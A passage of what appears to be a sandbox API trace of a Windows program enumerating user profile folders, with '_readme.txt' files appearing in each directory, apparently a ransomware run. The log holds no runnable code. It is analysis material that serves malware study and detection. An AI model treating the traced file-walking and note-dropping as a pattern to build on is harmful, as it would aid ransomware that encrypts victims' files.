(HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb6c8 [0091.001] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x310) returned 0x31ce460 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb670 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d840 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb510 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb618 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dbe8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dc50 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb408 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb9e0 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cba38 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316ddf0 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cba90 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316de58 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cbae8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cbb40 [0091.002] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb6c8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cac00 [0091.002] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fbc2590, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fbc2590, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb6c8 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb5c0 [0091.002] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0091.003] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0091.003] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.003] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.003] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.003] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.003] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x315f170 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.003] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.003] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.003] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.004] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.004] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.004] PathFindFileNameW (pszPath="") returned="" [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.004] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.004] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.004] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f8fabe0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x9f8fabe0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c) returned 0x31efce8 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db80 [0091.004] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x38) returned 0x31c7540 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316db18 [0091.004] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0091.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x54) returned 0x99d9c28 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d430 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d2f8 [0091.005] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0091.005] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.005] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dab0 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.005] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.005] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.005] PathFindFileNameW (pszPath="") returned="" [0091.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0091.005] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdb1770, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdb1770, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0xffffffff [0091.006] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.006] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.006] PathFindFileNameW (pszPath="") returned="" [0091.006] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d3c8 [0091.006] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0091.007] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0091.007] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.007] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.007] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.007] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.008] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.008] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.008] PathFindFileNameW (pszPath="") returned="" [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.008] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0091.008] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efce8 [0091.008] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0091.008] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3e28 [0091.009] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.009] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.009] PathFindFileNameW (pszPath="") returned="" [0091.009] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb3b0 [0091.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a5807e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8a5807e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.009] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8a5807e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8a5807e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.009] FindNextFileW 